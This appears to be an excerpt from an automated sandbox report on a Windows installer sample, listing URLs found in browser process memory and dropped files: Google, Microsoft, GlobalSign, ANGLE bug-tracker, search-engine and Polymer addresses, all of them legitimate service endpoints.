Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2915224736.000002E40037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000011.00000003.2792355991.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786862206.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788555348.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2817119685.000025980034C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: 6684V5n83w.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Evans.com, 0000000D.00000000.2217338938.0000000000B95000.00000002.00000001.01000000.00000007.sdmp, Evans.com.2.dr, Entities.9.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: lxlxt0.13.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chromecache_473.19.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_473.19.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp, chromecache_473.19.dr, chromecache_476.19.dr	String found in binary or memory: https://apis.google.com
Source: msedge.exe, 00000015.00000002.2986386086.000001EDF599F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://assets.msn.cn/resolver/
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: aieukn.13.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: aieukn.13.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL.24.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://c.msn.com/
Source: lxlxt0.13.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: service_worker_bin_prod.js.23.dr, offscreendocument_main.js.23.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000011.00000003.2787695410.0000259800CC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2987641130.000002E40016C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: manifest.json.23.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: chrome.exe, 00000011.00000003.2791053596.0000259800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788876317.0000259800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788277038.0000259800CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793533540.0000259800EFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788977368.0000259800EFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793379631.0000259800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2790601006.0000259800CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788928061.0000259800CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2799474468.0000259800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787695410.0000259800CC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000011.00000003.2792355991.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786862206.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788555348.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2817119685.000025980034C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000011.00000003.2792355991.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786862206.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788555348.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2817119685.000025980034C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: msedge.exe, 00000015.00000002.2987641130.000002E40016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.23.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000011.00000003.2774624423.0000327C002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2774606357.0000327C002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2986855820.000002E400040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chromecache_473.19.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_473.19.dr	String found in binary or memory: https://content.googleapis.com
Source: aieukn.13.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
